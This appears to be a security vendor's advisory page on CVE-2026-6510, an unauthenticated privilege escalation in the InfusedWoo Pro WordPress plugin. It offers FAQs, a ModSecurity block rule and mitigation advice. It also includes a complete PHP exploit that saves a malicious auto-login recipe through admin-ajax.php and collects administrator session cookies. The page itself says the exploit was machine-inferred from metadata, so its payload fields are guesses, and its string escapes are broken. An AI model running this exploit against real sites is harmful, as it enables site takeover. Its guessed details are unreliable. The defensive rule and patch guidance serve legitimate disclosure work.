What is CVE-2026-6510?

CVE-2026-6510 is a critical vulnerability in the InfusedWoo Pro plugin for WordPress, affecting versions up to and including 5.1.2. It allows unauthenticated attackers to escalate privileges due to missing authorization checks in the iwar_save_recipe AJAX handler.

How does the vulnerability work?

The vulnerability allows attackers to craft a malicious recipe that pairs an HTTP post trigger with an auto-login action. By exploiting this, an attacker can create a URL that, when visited by an unauthenticated user, grants them authentication cookies for any targeted user account.

Who is affected by this vulnerability?

Any WordPress site using the InfusedWoo Pro plugin version 5.1.2 or earlier is affected. Administrators can check their plugin version from the WordPress admin dashboard under ‘Plugins’.

What are the risks associated with CVE-2026-6510?

The CVSS score of 9.8 indicates a critical risk level, meaning successful exploitation can lead to complete administrative access to the WordPress site. This can result in the creation of new admin accounts, installation of malicious plugins, and data exfiltration.

How can I fix or mitigate this issue?

To fix this vulnerability, update the InfusedWoo Pro plugin to version 5.1.3 or later, which includes necessary nonce verification and capability checks. Additionally, review and monitor user accounts for any unauthorized changes.

What does nonce verification mean?

Nonce verification is a security measure that ensures requests made to a server are legitimate and originate from authenticated users. It prevents CSRF attacks and ensures that sensitive actions are not performed without proper authorization.

What are capability checks in WordPress?

Capability checks in WordPress are used to determine whether a user has the necessary permissions to perform certain actions. For this vulnerability, checks like current_user_can(‘manage_options’) ensure that only users with the appropriate roles can execute sensitive functions.

How does the proof of concept demonstrate the vulnerability?

The proof of concept shows how an attacker can craft a specific POST request to the vulnerable AJAX handler, creating a recipe that triggers an auto-login for an admin user. This illustrates the ease of exploitation due to the lack of authorization checks.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the InfusedWoo Pro plugin until it can be updated. Additionally, review server logs for any suspicious activity and restrict access to the admin area.

How can I monitor for exploitation attempts?

To monitor for exploitation attempts, enable logging for AJAX requests and review access logs for unusual patterns or requests to the admin-ajax.php file. Implementing a web application firewall (WAF) can also help detect and block malicious requests.

What is the significance of the CWE-862 classification?

CWE-862 indicates a missing authorization vulnerability, which means that the system does not properly verify if a user has the right to perform an action. This classification helps in understanding the nature of the security flaw and its implications.

What should I communicate to my users about this vulnerability?

Inform your users about the potential risks associated with the vulnerability, especially if they are administrators. Encourage them to update their plugins and monitor their accounts for any unauthorized access.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 13, 2026

CVE-2026-6510: InfusedWoo Pro <= 5.1.2 – Unauthenticated Missing Authorization to Privilege Escalation via 'iwar_save_recipe' (infusedwooPRO)

CVE ID CVE-2026-6510

Plugin infusedwooPRO

Severity Critical (CVSS 9.8)

CWE 862

Vulnerable Version 5.1.2

Patched Version —

Disclosed May 12, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6510 (metadata-based): This critical vulnerability in the InfusedWoo Pro plugin (versions <= 5.1.2) allows unauthenticated attackers to escalate privileges via the 'iwar_save_recipe' AJAX handler. The CVSS score of 9.8 and CWE-862 (Missing Authorization) indicate complete compromise of confidentiality, integrity, and availability.

The root cause is a missing authorization check in the iwar_save_recipe() function registered as a WordPress AJAX handler. Atomic Edge analysis infers that the handler is accessible via wp_ajax_nopriv_* and wp_ajax_* hooks without nonce verification or capability checks. The missing nonce verification is explicitly mentioned in the description, confirming that the function executes without validating the request origin. The missing capability check confirms that any user, even unauthenticated ones, can invoke the handler.

Exploitation requires crafting a POST request to /wp-admin/admin-ajax.php with the action parameter set to 'iwar_save_recipe'. The malicious payload must include recipe data that pairs an HTTP POST trigger with an auto-login action targeting a privileged user (e.g., administrator). The attacker constructs a recipe object where the 'trigger' is set to 'http_post' and the 'action' includes settings for automatic login as a specific user. After saving, any visitor to the URL specified in the recipe receives authentication cookies for the targeted account.

The remediation likely involves adding nonce verification using wp_verify_nonce() and capability checks such as current_user_can('manage_options') or similar before processing the recipe. The patch in version 5.1.3 should enforce both checks in the iwar_save_recipe() callback.

Successful exploitation grants unauthenticated attackers complete administrative access to the WordPress site. Attackers can then create new administrator accounts, install malicious plugins, modify content, exfiltrate the database, or execute arbitrary PHP code. This represents total site compromise and potential supply chain attack if the site distributes software or content.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-6510 (metadata-based)
# Block unauthenticated privilege escalation via InfusedWoo Pro iwar_save_recipe AJAX handler
# This rule blocks any request to admin-ajax.php with action=iwar_save_recipe
# The rule is precise: it matches the exact endpoint and action parameter
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20266510,phase:2,deny,status:403,log,chain,msg:'CVE-2026-6510 InfusedWoo Pro privilege escalation via iwar_save_recipe AJAX',severity:'CRITICAL',tag:'CVE-2026-6510',tag:'WordPress',tag:'InfusedWooPro',tag:'PrivilegeEscalation'"
  SecRule ARGS_POST:action "@streq iwar_save_recipe" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6510 - InfusedWoo Pro <= 5.1.2 - Unauthenticated Missing Authorization to Privilege Escalation via 'iwar_save_recipe'

// Configuration: set the target WordPress URL
$target_url = 'http://example.com';

// The malicious recipe payload that creates an auto-login for the admin user
// This recipe uses HTTP POST trigger and pairs it with an auto-login action
$recipe = array(
    'name' => 'AutoLogin Admin PoC',
    'triggers' => array(
        array(
            'type' => 'http_post',
            'settings' => array(
                'url' => '/auto-login-trigger'
            )
        )
    ),
    'actions' => array(
        array(
            'type' => 'auto_login',
            'settings' => array(
                'user_id' => 1, // Typically the admin user has ID 1
                'remember' => true
            )
        )
    ),
    'status' => 'active'
);

// Build the POST request to the AJAX handler
$post_data = array(
    'action' => 'iwar_save_recipe',
    'recipe' => json_encode($recipe)
);

// Initialize cURL
$ch = curl_init($target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt'); // Save cookies from response
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Execute the request to save the recipe
echo "Saving malicious recipe...n";
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if ($http_code == 200) {
    echo "Recipe saved successfully. The site is vulnerable.n";
    
    // Now trigger the auto-login by visiting the crafted URL
    $trigger_url = $target_url . '/auto-login-trigger';
    echo "Visiting trigger URL to receive admin cookies: $trigger_urln";
    
    curl_setopt($ch, CURLOPT_URL, $trigger_url);
    curl_setopt($ch, CURLOPT_POST, false);
    curl_setopt($ch, CURLOPT_HTTPGET, true);
    curl_setopt($ch, CURLOPT_HEADER, true);
    $trigger_response = curl_exec($ch);
    
    // Parse the Set-Cookie headers to get authentication cookies
    preg_match_all('/Set-Cookie: ([^;]+)/i', $trigger_response, $matches);
    if (!empty($matches[1])) {
        echo "Received cookies:n";
        foreach ($matches[1] as $cookie) {
            echo "  $cookien";
        }
        echo "nExploit successful: authentication cookies for admin user obtained.n";
    } else {
        echo "No cookies received. The trigger may require specific conditions.n";
    }
} else {
    echo "Failed to save recipe. HTTP status: $http_coden";
    echo "Response: " . substr($response, 0, 500) . "n";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-6510?
Overview of the vulnerability
CVE-2026-6510 is a critical vulnerability in the InfusedWoo Pro plugin for WordPress, affecting versions up to and including 5.1.2. It allows unauthenticated attackers to escalate privileges due to missing authorization checks in the iwar_save_recipe AJAX handler.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to craft a malicious recipe that pairs an HTTP post trigger with an auto-login action. By exploiting this, an attacker can create a URL that, when visited by an unauthenticated user, grants them authentication cookies for any targeted user account.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the InfusedWoo Pro plugin version 5.1.2 or earlier is affected. Administrators can check their plugin version from the WordPress admin dashboard under ‘Plugins’.
What are the risks associated with CVE-2026-6510?
Understanding the severity
The CVSS score of 9.8 indicates a critical risk level, meaning successful exploitation can lead to complete administrative access to the WordPress site. This can result in the creation of new admin accounts, installation of malicious plugins, and data exfiltration.
How can I fix or mitigate this issue?
Recommended actions
To fix this vulnerability, update the InfusedWoo Pro plugin to version 5.1.3 or later, which includes necessary nonce verification and capability checks. Additionally, review and monitor user accounts for any unauthorized changes.
What does nonce verification mean?
Importance of nonce in security
Nonce verification is a security measure that ensures requests made to a server are legitimate and originate from authenticated users. It prevents CSRF attacks and ensures that sensitive actions are not performed without proper authorization.
What are capability checks in WordPress?
Role-based access control
Capability checks in WordPress are used to determine whether a user has the necessary permissions to perform certain actions. For this vulnerability, checks like current_user_can(‘manage_options’) ensure that only users with the appropriate roles can execute sensitive functions.
How does the proof of concept demonstrate the vulnerability?
Technical illustration
The proof of concept shows how an attacker can craft a specific POST request to the vulnerable AJAX handler, creating a recipe that triggers an auto-login for an admin user. This illustrates the ease of exploitation due to the lack of authorization checks.
What should I do if I cannot update the plugin immediately?
Temporary measures
If immediate updates are not possible, consider disabling the InfusedWoo Pro plugin until it can be updated. Additionally, review server logs for any suspicious activity and restrict access to the admin area.
How can I monitor for exploitation attempts?
Proactive security measures
To monitor for exploitation attempts, enable logging for AJAX requests and review access logs for unusual patterns or requests to the admin-ajax.php file. Implementing a web application firewall (WAF) can also help detect and block malicious requests.
What is the significance of the CWE-862 classification?
Understanding the classification
CWE-862 indicates a missing authorization vulnerability, which means that the system does not properly verify if a user has the right to perform an action. This classification helps in understanding the nature of the security flaw and its implications.
What should I communicate to my users about this vulnerability?
User awareness and transparency
Inform your users about the potential risks associated with the vulnerability, especially if they are administrators. Encourage them to update their plugins and monitor their accounts for any unauthorized access.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations